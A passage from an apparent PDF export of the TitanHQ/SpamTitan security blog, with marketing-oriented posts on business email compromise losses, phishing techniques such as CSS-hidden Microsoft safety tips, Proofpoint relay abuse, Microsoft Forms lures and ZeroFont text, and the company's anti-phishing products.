raising awareness of the threat of BEC and VEC attacks. Since these\r\nscams target executives, IT, and HR staff, training for those users is vital. They should be made aware of the\r\nthreat, taught how to identify these scams, and the actions to take when a potentially malicious message is\r\nreceived. With the SafeTitan security awareness training program it is easy to create training courses and tailor the\r\ncontent to cover threats each user group is likely to encounter to ensure the training is laser-focused on the most\r\npertinent threats.\r\nWhile spam email filtering and security awareness training are the most important measures to implement, it is\r\nalso important to strengthen defenses against phishing through the adoption of multi-factor authentication on all\r\nemail accounts, to prevent initial compromise. Administrative controls should also be considered, such as\r\nrequiring employees to verify any high-risk actions, such as changes to bank accounts or payment methods, and\r\nmaintaining a contact list of verified contact information to allow phone verification of any high-risk change. This\r\ntwo-step verification method can protect against all BEC/VEC attacks and prevent fraudulent payments.\r\nNew SpamTitan Release Improves Protection Against Advanced Phishing and\r\nMalware Threats\r\nby G Hunt | August 27, 2024 | Industry News\r\nTitanHQ has upgraded its award-winning SpamTitan email security solution, with the latest release including\r\nseveral enhancements to improve protection against malware, phishing, and other advanced threats. The latest\r\nrelease – version 9 – of the flagship email security solution is named SpamTitan Skellig, which includes major\r\nenhancements to the anti-spam engine at the core of the solution to improve malware detection and new phishing\r\nenhancements to protect against ever-evolving sophisticated threats.\r\nSpamTitan is a leading cloud-based anti-spam service that has been shown in recent independent tests to provide\r\nexceptional protection against spam, phishing emails, and malware. The hosted spam filter includes a next-gen\r\nemail sandbox, up-to-the-minute threat intelligence feed, AI and machine learning algorithms, twin antivirus\r\nengines, and more. In June 2024, Virus Bulletin put the new version of SpamTitan to the test and gave it\r\nVBSpam+ certification, with the solution achieving the second-highest final score in the test of 12 leading email\r\nsecurity solutions. SpamTitan successfully blocked all malware samples, only missed one phishing email, and did\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 58 of 136\n\nnot generate any false positives. SpamTitan had a malware catch rate of 100%, a phishing catch rate of 99.99%, a\r\nspam catch rate of 99.98%, and was given an overall score of 99.984%.\r\nThe update to SpamTitan Skellig will ensure that users continue to have best-in-class protection against email\r\nthreats but there is more to the update than protecting against threats. SpamTitan has long been popular with end\r\nusers due to the ease of use of the solution, which is why users consistently give the solution 5-star reviews. The\r\nlatest release includes a brand new UI that is even more intuitive with improved navigation and better\r\nadministrative functions across the board and makes it easier to onboard new users.\r\nThe upgraded version is available to all new users and current users can upgrade and get better protection at no\r\nadditional cost for the upgrade and no change to the subscription price, with full assistance provided with\r\nupgrading if required. You can find out more about migrating to the new version here.\r\nMicrosoft 365 Flaw Confirms Need for Layered Phishing Protections for M365\r\nby G Hunt | August 19, 2024 | Uncategorized\r\nThe latest figures from Microsoft indicate that in 2024, around 1 million businesses worldwide are using\r\nMicrosoft 365, and in the United States alone there are around 1 million users of its Office suite. That makes\r\nMicrosoft 365 a big target for cybercriminals, and phishing is the main way that M365 users are targeted.\r\nMicrosoft includes cybersecurity protections for its customers that can block phishing emails and malware, and\r\nthose protections do a reasonable job of blocking malicious emails; however, threats do bypass defenses and reach\r\nend users, which is why many businesses choose to augment Microsoft’s protections with third-party anti-phishing\r\nand anti-malware solutions, and now there is another good reason to bolster protection.\r\nRecent research has uncovered a flaw in Microsoft’s anti-phishing measures that allows cybercriminals to bypass\r\nits email safety alerts. Microsoft’s First Contact Safety Tip generates these warnings when a user receives an email\r\nfrom an unfamiliar email address to warn them that the email may be malicious. The email will include the\r\nmessage “You don’t often get emails from xxx@xxx.com. Learn why this is important.” That message warns the\r\nuser to take extra care and if it is not shown in the email the user may assume that the message is legitimate.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 59 of 136\n\nThat warning message is added to the body of the HTML email and the problem with that approach is it is\r\npossible to manipulate the message by embedding Cascading Style Sheets (CSS), which is what researchers at\r\nCertitude discovered. They demonstrated that by manipulating the CSS within the HTML of the email, they were\r\nable to hide that warning, They did that by hiding the anchor tags (\u003ca\u003e) so the link is not displayed, changing the\r\nfont color to white, and forcing the email to have a white background, ensuring that the text is not displayed since\r\nit is also in white. While the warning is still included in the email this trick renders it invisible. They also showed\r\nthat it is possible to spoof Microsoft’s encrypted and signed icons to make the email appear secure.\r\nMicrosoft has confirmed that the finding is valid but has chosen not to address the problem at this time. Microsoft\r\nhas instead marked the issue for potential resolution through future product updates but there have been no known\r\ncases of this tactic being used in the wild and the issue was deemed to be sufficiently severe to qualify for\r\nimmediate servicing.\r\nThis issue serves as a reminder about M365 cybersecurity. Microsoft produces some excellent products that are\r\ninvaluable to businesses, but Microsoft is not a cybersecurity vendor and while protections have been added, they\r\ncan be circumvented. Microsoft 365’s EOP and Defender solutions do a good job at blocking most threats, but\r\nmalicious emails do get through to inboxes where they can be opened by end users. The Microsoft 365 spam filter\r\nonly provides an average level of protection against email threats.\r\nTitanHQ has developed cybersecurity solutions to address M365 security gaps and provide greater protection for\r\nMicrosoft 365 users through the SpamTitan spam filter for M365 and PhishTitan anti-phishing solution, both of\r\nwhich integrate seamlessly with Microsoft 365 and add important extra layers of protection against phishing, scam\r\nemails, and malware.\r\nThe engine that powers the SpamTItan and PhishTitan solutions has been independently tested and confirmed to\r\nprovide superior protection through advanced features designed to catch more malicious emails. Those measures\r\ninclude a powerful next-generation email sandbox for protecting against advanced email attacks. When emails\r\npass initial checks and scans using twin antivirus engines, they are sent to the sandbox for deep inspection, which\r\nallows malware to be identified from its behavior rather than a signature. These solutions include AI and machine\r\nlearning protection, where malicious emails can be identified based on how they deviate from the normal emails\r\nreceived by a business, improving protection against zero-day threats – phishing and business email compromise\r\nemails that have not been seen before.\r\nThe PhishTitan solution has been developed specifically for Microsoft 365 to provide unmatched protection\r\nagainst phishing threats. PhishTitan displays banner notifications in emails to warn end users about suspicious\r\ncontent, which will provide protection should Microsoft’s First Contact Safety Tip be hidden. Links in emails are\r\nrewritten to display their true destination, and the solution makes it quick and easy for security teams to remediate\r\nphishing threats throughout the entire email system.\r\nThe engine that powers these solutions has recently been shown to beat leading email security solutions such as\r\nMimecast for catch rate, malware catch rate, and has far lower false positives. In the June Virus Bulletin Test,\r\nTitanHQ had a 99.99% phishing catch rate, a spam catch rate of 99.98%, a malware catch rate of 100%, and zero\r\nfalse positives. PhishTitan catches 20 unique and sophisticated threats per 80,000 emails received that Microsoft\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 60 of 136\n\n365 misses. Give TitanHQ a call today to find out more about these solutions and how adding extra layers of\r\nprotection can strengthen your business’s security posture.\r\n$60 Million Lost in Single Business Email Compromise Scam\r\nby G Hunt | August 15, 2024 | Phishing \u0026 Email Spam, Security Awareness\r\nBusiness Email Compromise (BEC) has long been one of the costliest types of cybercrime. According to the latest\r\ndata from the Federal Bureau of Investigation (FBI) Internet Crime Compliant Center (IC3), almost 21,500\r\ncomplaints were received about BEC attacks in 2023 resulting in adjusted losses of more than $2.9 billion.\r\nBetween October 2013 and December 202, more than $50 billion was lost to BEC scams domestically and\r\ninternationally.\r\nWhat is Business Email Compromise?\r\nBEC, also known as email account compromise (EAC), is a sophisticated scam that involves sending emails to\r\nindividuals that appear to have come from a trusted source and making a legitimate-sounding request, which is\r\ntypically a change to bank account details for an upcoming payment or payment of a fake invoice.\r\nOne such scam targets homebuyers, with the attacker impersonating the title company and sending details for a\r\nwire transfer for a down payment for a house purchase. Businesses are commonly targeted and asked to wire\r\nmoney for an upcoming payment to a different bank account. While the scammer is usually based overseas, the\r\nbank account may be at a bank in the victim’s home country. When the funds are transferred by the victim they are\r\nimmediately transferred overseas or withdrawn, making it difficult for the funds to be recovered.\r\nBEC attacks often start with phishing emails. The scammers use phishing to gain access to an employee’s email\r\naccount, then the account is used to send phishing emails internally. The goal is to compromise the account of an\r\nexecutive such as the CEO or CFO. That account can then be used for the BEC part of the scam. Alternatively,\r\nvendors are targeted, such as construction companies, and their accounts are used for BEC attacks on their\r\ncustomers.\r\nOnce a suitable email account has been compromised, the scammers search through previous emails in the\r\naccount to find potential targets – the company’s customers in the case of a vendor account or individuals\r\nresponsible for making wire transfers in the case of a CEO’s account. The attackers study previous\r\ncommunications between individuals to learn the writing style of the account holder, and then craft their messages\r\nimpersonating the genuine account owner. AI tools may also be used for this part of the scam or even researching\r\ntargets. Alternatively, email accounts and websites may be spoofed, using slight variations of legitimate email\r\naddresses and domains. The information needed to conduct the scam may be gleaned from public sources or stolen\r\nvia malware infections.\r\nFrom here, a single request may be sent or a conversation may ensue over several emails to build trust before the\r\nrequest is made. Considerable time and effort is put into these scams because the effort is worth it for the\r\nscammers. The losses to these scams can be huge. Fraudulent wire transfers are often for tens of thousands of\r\ndollars or more, and with two recent scams, the losses have been immense.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 61 of 136\n\nTens of Millions Fraudulently Obtained in BEC Scams\r\nINTERPOL recently reported that it had successfully recovered more than $40 million stolen in a single BEC\r\nattack. The scammers targeted a commodities firm in Singapore, impersonating one of the company’s suppliers. In\r\nJuly, an email was received that had apparently been sent by the supplier requesting a pending payment be sent to\r\na new bank account, in this case, the account was based in Timor Leste. In this scam, the email was sent from an\r\naccount that differed slightly from the supplier’s legitimate email address. That difference was not identified and\r\nthe bank account details were changed. A payment of $42.3 million was made to the account, and the transfer was\r\nonly determined to be fraudulent when the supplier queried why the payment had not been received. INTERPOL\r\nwas able to assist with the recovery of $39 million, and seven arrests were made which also involved the recovery\r\nof a further $2 million.\r\nThere has since been an even bigger scam and the victim was not so fortunate. The chemical manufacturing\r\ncompany Orion reported falling victim to a BEC attack that resulted in a $60 million loss. The Luxembourg firm\r\ntold the U.S. Securities and Exchange Commission (SEC) that a non-executive employee was tricked into\r\ntransferring the funds to multiple third-party accounts. So far, that loss has not been recovered.\r\nHow to Reduce Risk And Defeat BEC Attacks\r\nDefending against BEC attacks can be a challenge, as legitimate email accounts are often used and the scammers\r\nare expert impersonators. The use of AI tools makes these scams even more difficult to identify. Defending against\r\nBEC attacks requires a defense-in-depth approach to prevent malicious emails from being delivered and prepare\r\nthe workforce by improving awareness of the threats.\r\nSecurity awareness training is vital. All members of the workforce should receive training and be made aware of\r\nBEC scams (and other cybersecurity threats). Training should cover the basics of these scams, such as why they\r\nare conducted and the attackers’ aims, as well as the red flags to look for. Phishing simulations can be highly\r\nbeneficial, as BEC scams can be simulated to put training to the test and give individual practice at identifying\r\nthese scams. TitanHQ’s SafeTitan platform includes BEC training material and a phishing simulator and makes it\r\neasy for businesses to improve their human defenses against BEC attacks.\r\nPolicies and procedures should be developed and implemented to reduce risk. For instance, it should be company\r\npolicy for any requested change to banking credentials to be reviewed by a supervisor, and for any requested bank\r\naccount changes by vendors to require verification by phone, using previously verified contact information.\r\nIt is vital to implement technical security measures to prevent email accounts from being compromised, malware\r\nfrom being installed, and to identify and block BEC emails. Traditional anti-spam software often fails to detect\r\nthese sophisticated threats. A standard anti-spam appliance will perform a range of checks on the sender’s\r\nreputation and may be able to detect and block spoofed emails, but generally not emails sent from legitimate\r\ncompromised accounts. Traditional anti-spam and antivirus solutions can detect known malware, but not novel\r\nmalware threats.\r\nWhat is needed is a next-generation hosted anti-spam service with machine learning and AI capabilities that can\r\nlearn about the standard emails sent and received by a company or individual and determine when emails deviate\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 62 of 136\n\nfrom the norm and flag them as suspicious. AI-based protection is needed to defeat cybercriminals ‘ use of AI\r\ntools. The spam filtering service should also include email sandboxing in addition to standard anti-virus protection\r\nto identify and block novel malware threats, to prevent the malware infections that are used to gather information\r\nto support BEC attacks. SpamTitan from TitanHQ has all these features and more, with recent independent tests\r\nconfirming the solution provides exceptional protection against phishing, spam, and sophisticated threats such as\r\nBEC attacks.\r\nThe most important thing to do is to take proactive steps to improve your defenses. Doing nothing could see your\r\nbusiness featured in the next set of FBI statistics. Give the TitanHQ team a call today to discuss the best defenses\r\nfor your business and find out more about how TitanHQ can help block BEC attacks and other cyber threats.\r\nTraining, Automation, AI, and Machine Learning Key to Reducing Data Breach\r\nCosts\r\nby G Hunt | July 31, 2024 | Network Security\r\nEach year, IBM conducts a study of data breaches to determine how much these incidents are costing businesses,\r\nthe main factors that contribute to that cost, and how attackers are gaining access to their victims’ networks. Aside\r\nfrom 2020, data breach costs have continued to increase annually, and this year is no exception. The average cost\r\nof a data breach has risen from $3.86 million in 2018 to $4.88 million in 2024 and has increased by 10% since last\r\nyear. The highest costs were incurred at critical infrastructure entities, especially healthcare organizations.\r\nBreaches at the latter were the costliest at an average of $9.77 million per incident.\r\nThe report is based on 3,556 interviews with individuals at 604 organizations who had knowledge about data\r\nbreaches at their respective organizations. The data breaches included in the report involved between 2,100 and\r\n113,000 compromised records and occurred between March 2023 and February 2024. The calculations include\r\ndirect costs such as the breach response, ransom paid, forensic analysis, and regulatory fines, as well as indirect\r\nexpenses such as in-house investigations, loss of business, and loss of customers.\r\nThis year’s Cost of a Data Breach Report revealed the high cost of breaches stemming from phishing, business\r\nemail compromise, social engineering, and stolen credentials, which are the costliest incidents to resolve.\r\nBreaches stemming from stolen credentials and phishing were the costliest root cause, as was the case in\r\n2023. Compromised credentials were the leading attack vector and were behind 16% of breaches, with phishing\r\nthe next most common behind 15% of breaches. In terms of cost, phishing attacks cost an average of $4.88 million\r\nand compromised credentials cost $4.81 million. Business email compromise attacks were also costly at an\r\naverage of $4.88 million with social engineering incidents costing an average of $4.77 million.\r\nThe report dives into the factors that contribute to the cost of a breach and the main areas where businesses have\r\nbeen able to reduce costs. The main factors that contributed to the cost of a breach were security system\r\ncomplexity, a security skills shortage, and third-party breaches, which are difficult things to address. Businesses\r\nhave been able to reduce breach costs by implementing a number of measures, and the two biggest factors were\r\nemployee training and AI/machine learning insights, with one constant identified being the use of AI and\r\nautomation in security.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 63 of 136\n\nEmployee training was determined to reduce the average breach cost by $258,629, with the most important aspect\r\nof training related to detecting and stopping phishing attacks. If a business is targeted in a phishing campaign, it\r\nmay not be possible to prevent all employees from being fooled by the campaign, but through regular training and\r\nphishing simulations, the severity of the incident can be greatly reduced. For instance, a recent phishing attack on\r\na U.S. healthcare organization resulted in more than 50 email accounts being compromised.  More effective\r\ntraining could have prevented many of those employees from being tricked, greatly reducing the severity of the\r\nattack and the cost of remediation.\r\nAI and machine learning insights were determined to reduce the average breach cost by $258,538, a close second\r\nin terms of cost reduction. Cybercriminals are leveraging AI in their attacks, especially for phishing and social\r\nengineering attacks. Network defenders need to leverage AI and machine learning tools to help them defend\r\nagainst these attacks and identify phishing, social engineering, and BEC threats, which are becoming much harder\r\nfor humans to spot. Automation is key, especially due to the cybersecurity skills shortage – one of the leading\r\nfactors that increases breach costs. Network defenders are overworked, and automation is key to reducing their\r\nworkload, especially since it is difficult to find and retain skilled cybersecurity staff.\r\nAt TitanHQ, we understand the importance of staff training, and the benefits of AI, machine learning, and\r\nautomation and offer businesses an easy way to implement these and better protect themselves from cyberattacks,\r\nremediate incidents quickly and efficiently, and ensure that their workforce is well trained and aware of cyber\r\nthreats and how to avoid them. Security awareness training is provided through the SafeTitan platform, which\r\nincludes an extensive library of engaging training content to teach security best practices, raise awareness of cyber\r\nthreats, and teach employees how to recognize and avoid threats including phishing, social engineering, and\r\nbusiness email compromise.\r\nThe content is constantly refreshed to account for changing work practices, technology, and the latest tactics,\r\ntechniques, and procedures being used by cybercriminals. The phishing simulator includes hundreds of templates\r\ntaken from real-world phishing attempts to reinforce training and identify employees who fall for phishing\r\nattempts. It is quick and easy to create training courses and phishing simulations, and importantly, to automate\r\nthem to run continuously throughout the year. The platform also automatically delivers training modules to\r\nemployees in response to mistakes such as phishing simulation failures, to ensure training is delivered in real-time\r\nwhen it is needed the most and likely to have the greatest impact.\r\nTitanHQ offers two cutting-edge products to protect against email-based attacks, especially phishing and social\r\nengineering attempts. SpamTitan is a cloud-based anti-spam service (or can be provided as a gateway spam filter)\r\nthat incorporates exceptional malware protection, email sandboxing, AI, and machine learning algorithms to\r\nidentify and quarantine sophisticated threats, including novel threats that have not been seen before. In recent\r\nindependent tests, the machine learning algorithms and other threat detection features achieved a detection rate of\r\nover 99.99%.\r\nPhishTitan incorporates the same AI and machine learning capabilities to identify and block more threats in Office\r\n365 environments. PhishTitan layers extra protection on top of Microsoft 365’s EOP and Defender provides best-in-class phishing protection. PhishTitan is also a remediation solution for automating the response to phishing\r\nthreats to reduce the burden on IT staff, including instant inbox threat removal of emails containing malicious\r\nURLs and tenant-wide remediation with robust cross-tenant features for detection and response.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 64 of 136\n\nWith these solutions, businesses can improve protection, prevent data breaches, and greatly reduce costs while\r\neasing the burden on their IT staff. They are also easy to implement and use, as we understand that IT staff don’t\r\nneed any more management headaches. For more information, give the TitanHQ team a call to discuss your\r\nrequirements, find out more about the products, and arrange a product demonstration. All three products are also\r\navailable in a free trial to allow you to put them to the test and see the difference they make.\r\nMassive Phishing Campaign Defeats SPF and DKIM by Leveraging Proofpoint\r\nMisconfiguration\r\nby G Hunt | July 31, 2024 | Phishing \u0026 Email Spam\r\nA massive phishing campaign that involved around 3 million emails a day was made possible due to a\r\nmisconfiguration in Proofpoint’s email servers. The vulnerability was exploited to get the emails DomainKeys\r\nIdentified Mail (DKIM) signed and approved by SPF, thereby ensuring the emails were delivered to inboxes.\r\nResearchers at Guardio identified the campaign, which ran from January 2024 to June 2024 and at its peak\r\ninvolved sending around 14 million emails a day. The purpose of the campaign was to steal credit card numbers\r\nand set up regular credit card payments. The emails impersonated well-known brands such as Nike, Disney, Coca-Cola, and IBM. As is common in phishing attempts, the headers of the emails were spoofed to make it appear that\r\nthe email had been sent by a genuine company. The majority of spam filters would be able to detect this spoofing\r\nand block the emails because they use Sender Policy Framework (SPF) and DKIM, specifically to detect and\r\nprevent spoofing.\r\nEmails must be sent from approved servers to pass SPF checks and they must be authenticated using the DKIM\r\nencryption key for the domain. With DKIM, public-key cryptography is used to sign an email with a private key\r\nwhen it leaves the sender’s server, and the recipient server uses the public key to verify the source of the message.\r\nIf the from filed matches the DKIM check is passed and the email is determined to be authentic and will be\r\ndelivered. If not, the email will identified as spam and will be blocked. In this campaign the emails were all\r\nproperly signed and authenticated, ensuring that they would be delivered.\r\nFor an email that impersonated Nike, a spoofed email address would be used with the nike.com domain, which\r\nthanks to passing the SPF and DKIM checks, would be verified by the recipient as having been authenticated. The\r\nrecipient may be fooled that the email has come from the genuine company domain, and since the emails\r\nthemselves contained that company’s branding and provided a plausible reason for taking action, the user may\r\nclick the link in the email.\r\nAs with most phishing emails, there is urgency. Action must be taken quickly to avoid negative consequences,\r\nsuch as an impending charge, notification about the closure of an account, or another pressing matter.  If the link is\r\nclicked, the user will be directed to a phishing site that also spoofs the brand and they are asked to provide their\r\ncredit card details. Alternatively, they are offered a too-good-to-be-true offer, and by paying they also enroll in an\r\nongoing subscription involving sizeable monthly charges.\r\nThe way that the attackers got around the checks was to send the emails from an SMTP server on a virtual server\r\nunder their control and to route them through a genuine Office 365 account on an Online Exchange server, then\r\nthrough a domain-specific Proofpoint server which sent the email on to the intended recipient. Since the\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 65 of 136\n\nProofpoint customers being spoofed had authorized the Proofpoint service to send emails on their behalf as an\r\nallowed email sender, the attackers only had to find a way to send spoofed emails through the Proofpoint relay.\r\nDue to a misconfiguration that allowed Microsoft Office 365 accounts to easily interact with its relay servers, they\r\nwere able to do just that, pass SPF and DKIM checks, and make their fake emails appear to be clean.\r\nThey obtained the MX record for the company being spoofed by querying the domain’s public DNS, then routed\r\nthe email through the correct Proofpoint host that is used to process email for that domain. Since the Proofpoint\r\nserver was tricked into believing that the emails had come from the genuine domains of its customers – such as\r\nNike and Disney – the emails were then forwarded to the intended recipients rather than being quarantined.\r\nSpammers are constantly developing new methods of defeating the best email security solutions and while email\r\nsecurity products can usually block spam and malicious emails, some will be delivered to recipients. This is why it\r\nis important to have layered defenses in place to protect against all phases of the attack. For instance, in this\r\nattack, spam filters were bypassed, but other measures could detect and block this attack. For instance, a web filter\r\ncan be used to prevent a user from visiting a phishing website linked in an email, and security awareness training\r\nshould be conducted to teach employees how to identify the signs of phishing, to check the domain of any website\r\nlinked in an email, and to also check the domain when they arrive on any website.\r\nMicrosoft Forms Used in Phishing Campaign Targeting M365 Credentials\r\nby G Hunt | July 31, 2024 | Phishing \u0026 Email Spam\r\nMicrosoft credentials are being targeted in phishing campaigns that abuse Microsoft Forms. Microsoft Forms is a\r\nfeature of Microsoft 365 that is commonly used for creating quizzes and surveys. Microsoft Forms has been used\r\nin the past for phishing campaigns, and Microsoft has implemented phishing protection measures to prevent\r\nabuse, but these campaigns show that those measures are not always effective.\r\nTo increase the probability of the phishing emails being delivered and the recipients responding, threat actors use\r\ncompromised email accounts for the campaigns. If a business email account can be compromised in a phishing\r\nattack, it can be used to send phishing emails internally. Vendor email accounts are often targeted and used to\r\nconduct attacks on their customers. The emails are likely to be delivered as they come from a trusted account,\r\nwhich may even be whitelisted on email security solutions to ensure that their messages are delivered.\r\nIf the recipient clicks the link in the email they are directed to a Microsoft Form, which has an embedded link that\r\nthe user is instructed to click. If the link is clicked, the user is directed to a phishing page where they are asked to\r\nenter their Microsoft 365 credentials. If the credentials are entered, they are captured by the attacker and are used\r\nto access their account.\r\nThe initial contact includes messages with a variety of lures, including fake delivery failure notifications, requests\r\nto change passwords, and notifications about shared documents. When the user lands on the form, they are told to\r\nclick a link and fill in a questionnaire, that link then sends the user to a phishing page that appears to be a genuine\r\nlogin page for Microsoft 365 or another company, depending on which credentials are being targeted.\r\nThe attackers make their campaign more realistic by using company logos in the phishing emails and familiar\r\nfavicons in the browser tab on the fake web pages. Since Microsoft Forms is used in this campaign, the URL\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 66 of 136\n\nprovided in the phishing emails has the format https://forms.office[dot]com, as the forms are on a genuine\r\nMicrosoft Forms domain. Not only does that help to trick the user into thinking the request is genuine, but it also\r\nmakes it much harder for email security solutions to determine that the email is not legitimate as the\r\nforms.office[dot]com is generally trusted as it has a high reputation score.\r\nWhen these phishing campaigns are detected, Microsoft takes prompt action to block these scams. Each form has\r\na ‘report abuse’ button, so if the scams are identified by users, Microsoft will be notified and can take action to\r\nshut it down. The problem is that these emails are being sent in huge numbers and there is a considerable window\r\nof opportunity for the attacks. Further, if the attacker’s campaign is detected, they can just set up different web\r\npages and forms and continue.\r\nThese phishing campaigns involve two phases, the first phase involves compromising email accounts to send the\r\ninitial phishing emails. An advanced email security solution with sandboxing, URL rewriting, and AI-based\r\ndetection capabilities will help to block this first phase of the attack. Advanced anti-phishing solutions for Office\r\n365 can reduce the number of phishing emails that land in inboxes, even when sent from trusted email accounts.\r\nBanner warnings in emails will help to alert users to potential phishing emails; however, users need to be vigilant\r\nas it may be up to them to spot and report the phishing attempt. That means security awareness training should be\r\nprovided to raise awareness of these types of phishing attempts.\r\nSecurity awareness training should also incorporate phishing simulations, and it is recommended to create\r\nsimulations of phishing attempts using Microsoft Forms. If users fall for the fake Microsoft Forms phishing\r\nattempts, they can be provided with further training and told how they could have identified the scam. If another\r\nMicrosoft Forms phishing attempt is received, they are more likely to be able to identify it for what it is.\r\nTitanHQ can help businesses improve their defenses against phishing through the TitanHQ cybersecurity suite,\r\nwhich includes SpamTitan cloud-based anti-spam service, the PhishTitan anti-phishing solution, and the SafeTitan\r\nsecurity awareness and phishing simulation platform. SpamTitan and PhishTitan have exceptionally high detection\r\nrates with a low false positive rate, and SafeTitan is the only behavior-driven security awareness training platform\r\nthat delivers training in real-time in response to employee mistakes. Give the TitanHQ team a call today for more\r\ninformation about these products, you can book a product demonstration to find out more, and all solutions are\r\navailable on a free trial.\r\nDon’t Put Up with Substandard Phishing Protection for M365!\r\nby G Hunt | July 29, 2024 | Phishing \u0026 Email Spam\r\nBusinesses that rely on Microsoft Defender for detecting malware and phishing emails may not be as well\r\nprotected as they think. While Defender performs a reasonable job at blocking malware, spam, and phishing\r\nemails, it lacks the high detection levels of many third-party anti-phishing solutions.\r\nTake malware for example. A study conducted in 2022 by AV-Comparatives found Defender only had a 60.3%\r\noffline detection rate. Fast forward to Q2, 2024, and TitanHQ’s email security suite was put to the test alongside\r\n12 other email security solutions by Virus Bulletin. In the independent tests, TitanHQ had a malware catch rate of\r\n100%.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 67 of 136\n\nIn the same round of testing, TitanHQ’s spam filter for Office 365 and the email security suite had a spam catch\r\nrate of over 99.98%, a phishing email catch rate of 99.99%, and was given an overall final score of 99.984, the\r\nsecond highest in the tests. It is possible to configure an email solution to provide maximum protection; however,\r\nthat will be at the expense of an elevated number of false positives – genuine emails that are inadvertently marked\r\nas potentially suspicious and are quarantined until they are released by an administrator. In the tests, TitanHQ had\r\na 0.00% false positive rate, with no genuine emails misclassified.\r\nAnother issue with Microsoft Defender is the exception list, which contains locations such as files, folders, and\r\nprocesses that are never scanned. These are used to ensure that legitimate apps are not scanned, to prevent them\r\nfrom being misclassified as malware. The problem is that the exception list lacks security protections, which\r\nmeans it can be accessed internally by all users. Should a device be compromised, a threat actor could access the\r\nexceptions list, identify folders and files that are not scanned, and use those locations to hide malware.\r\nGiven the increasingly dangerous threat environment and the high costs of a cyberattack and data breach,\r\nbusinesses need to ensure they are well-defended, which is why many businesses are choosing to protect their\r\nMicrosoft 365 environments with TitanHQ’s PhishTitan anti-phishing solution.\r\nPhishTitan is a cloud-based, AI-driven solution for Microsoft 365 that integrates seamlessly into M365 to increase\r\nprotection from sophisticated phishing attacks. Rather than replacing Microsoft’s EOP and Defender protections,\r\nPhishTitan augments them and adds next-generation phishing protection, not only ensuring that more threats are\r\nblocked but also giving users easy-to-use remediation capabilities.\r\nPhishTitan adds advanced threat detection capabilities through machine learning and LLM to identify the zero-day\r\nand emerging threats that are missed by Defender. PhishTitan provides real-time protection against phishing links\r\nin emails in addition to checks performed when the email is received. URLs are rewritten for Link Lock protection\r\nwith all links reassessed at the point a user clicks to ensure that URLs that have been made malicious after\r\ndelivery are detected and blocked. If the link is detected as malicious, access to that URL will be prevented.\r\nPhishTitan also adds banner notifications to emails to alert users to unsafe content and emails from external\r\nsources, and the auto-remediation feature allows all threats to be instantly removed from the entire mail system,\r\nwith robust cross-tenant features for detection and response for MSPs.\r\nPhishTitan has also been developed to be quick to set up and configure. There is no need to change MX records,\r\nsetup typically takes less than 10 minutes, and the solution is incredibly easy to manage. Why put up with inferior\r\nthreat detection and complex interfaces, when you can improve the Office 365 phishing protection with an easy-to-use anti-phishing solution\r\nDon’t take our word for it though. Take advantage of the free trial of PhishTitan to see for yourself. Product\r\ndemonstrations can also be arranged on request.\r\nZeroFont Phishing Scam Targets Microsoft 365 Users\r\nby G Hunt | July 27, 2024 | Phishing \u0026 Email Spam\r\nA ZeroFont phishing campaign is being conducted that targets Microsoft 365 users. Rather than using the\r\nZeroFont technique to hide malicious content from anti-spam software, this method aims to trick end users into\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 68 of 136\n\nthinking the email is genuine and safe.\r\nThe ZeroFont phishing technique was first identified in phishing attempts around five years ago, so it is not a new\r\ntechnique; however, this version uses a novel approach. When an email is sent to a business user, before that email\r\nis delivered it will be subject to various checks by the anti-spam server. The business’s anti-spam solution will\r\nperform reputation checks, scan the email for malware, and analyze the content of the email to search for signs of\r\nspam or phishing. Only if those checks are passed will the message be delivered to the end user. ZeroFont is a\r\ntechnique for hiding certain words from email security solutions to ensure that the messages are not flagged as\r\nspam and are delivered.\r\nAccording to Check Point, Microsoft is the most commonly impersonated brand in phishing emails. If a threat\r\nactor impersonates Microsoft, they obviously cannot send the email from the Microsoft domain as they do not\r\nhave access. Spam filters will check to make sure that the domain from which the email is sent matches the\r\nsignature, and if there is no match, that is a strong signal that the email is not genuine. With ZeroFont, the\r\nsignature used would only display Microsoft to the end user, and the spam filter is presented with a nonsensical\r\nstring of text. The user would not see that text as the padding text around the word Microsoft is set to a font size of\r\nzero, which means the text is machine-readable but cannot be seen by the user.\r\nA recent campaign uses the ZeroFont techniques but with a twist. In this campaign, the aim is not to trick a spam\r\nfilter but to instead trick Outlook users. In Outlook, it is possible to configure the mail client with a listing view\r\noption, which will show the user the first lines of text of an email. The problem for phishers is getting Outlook\r\nusers to engage with the messages, which means the messages must be sufficiently compelling so as not to be\r\ndeleted without opening them. This is especially important if the sender of the email is not known to the recipient.\r\nThe email was detected by Jan Kopriva, who noticed that ZeroFont was used to make the message appear\r\ntrustworthy by displaying text indicating the message had been scanned and secured by the email security\r\nsolution, rather than showing the first lines of visible content of the message. This was achieved by using a zero\r\nfont size for some of the text. The threat actor knew that the first lines of the emails are displayed by the mail\r\nclient in the listing view, regardless of the font size, which means if the font is set to zero, the text will be\r\ndisplayed in the listing view but will not be visible to the user in the message body when the email is opened.\r\nThe email used a fake job offer as a lure and asked the user to reply with their personal information: Full name,\r\naddress, phone number, and personal email, and impersonated the SANS Technology Institute. The full purpose of\r\nthe phishing attempt is not known. There were no malicious links in the email and no malware attached so the\r\nemail would likely pass through spam filters. If a response is received, the personal information could be used for\r\na spear phishing attempt on the user’s personal email account, which is less likely to have robust spam filtering in\r\nplace, or for a voice phishing attempt, as we have seen in many callback 